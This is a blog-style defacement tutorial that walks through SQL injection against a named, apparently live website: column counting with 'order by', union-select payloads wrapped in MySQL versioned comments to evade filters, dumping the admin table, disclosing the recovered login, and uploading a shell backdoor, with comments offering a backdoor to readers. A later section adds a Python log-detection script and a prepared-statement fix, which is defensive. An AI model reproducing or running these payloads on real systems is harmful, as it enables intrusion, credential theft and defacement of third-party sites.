Deface poc SQL-Injection Up Shell

 (SQL-i deface with 4 live targets!!)




Tools and materials
  • Dork : inurl:product.php?id=10 site:in (develop it further, bro)
  • Internet
  • Shell backdoor
  • Anonhackbar if you have it; if not, a regular browser works too, it just makes things easier, bro.
  • A good-looking face :)
  • Chocolate Malkist crackers, bro; mom knows best, so the hacking is sure to be halal, bro👊

Live target:

•http://apos.in/product.php?id=4&pname=%20Moong%20Dal%20500%20Gm
The one above will be the live target.

These are for you to try, guys :) all of the sites are SQL-vulnerable, level: easy.

Okay, let's move on to the tutorial:
1. Dorking; a reverse IP lookup is fine too if you want.
2. Once you've found a vulnerable one, move on to finding its admin login (adlog); only if there is an admin login do you go ahead and inject.
3. Since I already have a live target, let's go.
4. http://apos.in/product.php?id=4&pname=%20Moong%20Dal%20500%20Gm
First, add a single quote (') to find out whether it is vulnerable or not, then continue.
5. Let's look for the admin login first, bro.
http://apos.in/admin/  so it turns out this is the admin login, let's go inject :v
5.http://apos.in/product.php?id=4'&pname=%20Moong%20Dal%20500%20Gm ->Error
6.http://apos.in/product.php?id=4'+order+by+1--+&pname=%20Moong%20Dal%20500%20Gm ->Normal
(Keep going until you get an error)
7.http://apos.in/product.php?id=4'+order+by+122--+&pname=%20Moong%20Dal%20500%20Gm -> the error at 122 means there are 121 columns; okay, let's move on to finding the "lottery numbers" :v
8.http://apos.in/product.php?id=4%27+and+0+/*!50000union*/+/*!50000select*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121--+&pname=%20Moong%20Dal%20500%20Gm
Now the lottery numbers appear; this time I pick number 12, then we just dump the database using your own DIOS; if you don't have one, just use mine:


10. Let's try putting the DIOS into the lottery number


11. Dump the admin table using DIOS, bro, like this:
http://apos.in/product.php?id=4'+and+0+/*!50000union*/+/*!50000select*/+1,2,3,4,5,6,7,8,9,10,11,(SELECT(@x)FROM(SELECT(@x:=0x00),(SELECT(@x)FROM(admin)WHERE(@x)IN(@x:=/*!50000CONCAT*/(0x20,@x,name,0x203a3a20,pass,0x3c62723e))))x),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121--+&pname= Moong Dal 500 Gm
So the username and password are account@apos.in/admin@
12. Then just log in.


Once you're in like this, just upload the shell :)


There, one more dir lol; okay, that's enough for this tutorial. Apologies if anything is unclear, you can ask in the comments section :)
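
Seen from the server side, the request sequence in the steps above (a stray quote after a numeric `id`, `order by` with a rising number, then `union select` wrapped in `/*!50000...*/` comments) stands out in web access logs once the URL encoding and MySQL versioned comments are stripped. The Python below is an added example, not part of the original post; the log lines, client IPs and rule names are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample (client IP, request target) pairs; not taken from a real server.
SAMPLE_LOG = [
    ("203.0.113.7", "/product.php?id=4&pname=%20Moong%20Dal"),
    ("203.0.113.7", "/product.php?id=4'&pname=x"),
    ("203.0.113.7", "/product.php?id=4'+order+by+1--+&pname=x"),
    ("203.0.113.7", "/product.php?id=4'+order+by+122--+&pname=x"),
    ("203.0.113.7", "/product.php?id=4%27+and+0+/*!50000union*/+/*!50000select*/+1,2,3--+"),
    ("198.51.100.9", "/product.php?id=10&pname=Order%20by%20phone"),  # benign look-alike
]

# MySQL executes the body of /*!NNNNN ... */, so unwrap it instead of dropping it.
VERSIONED = re.compile(r"/\*!\d*(.*?)\*/", re.S)
# Ordinary comments such as /**8**/ are only padding and can be deleted.
PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.S)

RULES = [
    ("order_by_probe", re.compile(r"\border\s+by\s+\d+")),
    ("union_select", re.compile(r"\bunion\s+(all\s+)?select\b")),
    ("schema_enum", re.compile(r"\binformation_schema\b")),
    ("quote_in_numeric_id", re.compile(r"[?&]id=\d+'")),
]

def normalize(target):
    """URL-decode, unwrap versioned comments, drop plain comments, lowercase."""
    s = unquote_plus(target)
    s = VERSIONED.sub(r" \1 ", s)
    s = PLAIN_COMMENT.sub("", s)
    return re.sub(r"\s+", " ", s).lower()

def classify(target):
    """Return the names of all rules that match one request target."""
    s = normalize(target)
    return [name for name, rx in RULES if rx.search(s)]

def suspicious_clients(log, threshold=2):
    """Report clients that tripped at least `threshold` distinct rules."""
    hits = {}
    for ip, target in log:
        for name in classify(target):
            hits.setdefault(ip, set()).add(name)
    return {ip: sorted(n) for ip, n in hits.items() if len(n) >= threshold}

if __name__ == "__main__":
    print(suspicious_clients(SAMPLE_LOG))
```

Detection only buys time: the underlying fix is for the page that reads `id` to bind it as an integer parameter in a prepared statement instead of concatenating it into the query.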


2 comments on "Deface poc SQL-Injection Up Shell"

  1. Bro, how do I get a shell?

    1. Scroll to the very bottom, then click 'contact admin', and I'll give you a good shell backdoor
